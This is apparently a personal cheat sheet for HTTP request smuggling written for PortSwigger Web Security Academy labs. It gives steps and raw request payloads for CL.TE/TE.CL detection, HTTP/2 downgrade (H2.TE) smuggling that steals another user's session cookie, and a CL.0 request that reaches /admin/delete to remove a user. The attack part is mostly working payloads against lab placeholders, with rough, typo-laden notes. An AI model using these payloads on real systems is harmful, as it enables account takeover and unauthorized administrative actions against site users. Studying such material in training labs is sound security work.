Determine whether the target is using a proxy server, load balancer, or other intermediary server between the client and the backend server. Tools like Burp Suite can help identify whether multiple servers are handling the requests.
Analyze HTTP request handling:
Look for any differences in how the front-end server and the backend server parse requests. In particular, check for discrepancies in how Content-Length and Transfer-Encoding headers are interpreted.
Craft smuggling payload:
Construct an HTTP request that exploits the difference between how the servers parse the headers. For example:
POST / HTTP/1.1
Host: victim.com
Content-Length: 13
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: victim.com
This can cause the front-end server to forward a part of the request as-is to the backend, while the backend might interpret the second request (GET /admin) as a separate request.
Test smuggling with tools:
Use tools like Burp Suite to send crafted HTTP requests and observe how the server handles them. A successful HTTP Request Smuggling attack might result in the server interpreting multiple requests differently.
Exploit access:
Once smuggling is successful, use the vulnerability to send unauthorized requests (e.g., accessing internal admin pages) or to deliver further attacks, like exploiting XSS or stealing session tokens from other users.
Detection
#1
Content-Length: 6
Transfer-Encoding: chunked
\r\n
3\r\n
abc\r\n\
X\r\n
\r\n
if response -> CL.CL
if reject from frontend(imidiately) -> TE.CL/TE.TE
timeout from backend(longeeer) -> CL.TE
#2
Content-Length: 6
Transfer-Encoding: chunked
\r\n
0\r\n
\r\n
X
if response(backend) -> CL.CL/TE.TE
timeout from backed -> TE.CL
socket poison(backend) -> CL.TE
TE.TE
Duplicate header names are allowed, and the vulnerability is detected as dualchunk, then add an additional header with name and value = Transfer-encoding: cow.
Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests and fails to adequately sanitize incoming headers. Exploitation is by use of an HTTP/2-exclusive request smuggling vector to steal a victims session cookie and gain access to user's account.
Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.
Search is reflected on website
#new req header
foo: bar\r\n
Transfer-Encoding: chunked
#Then add body to req:
0
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800
search=nutty
H2.TE desync v10a h2path
Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length. Steal the session cookie, of the admin visiting the target. The Burp extension, HTTP Request Smuggler will identify the vulnerability as HTTP/2 TE desync v10a (H2.TE) vulnerability.
POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n
CL0
Send button, change the send mode to Send group in sequence (single connection).
POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT
GET /admin/delete?username=carlos HTTP/1.1
Foo: x
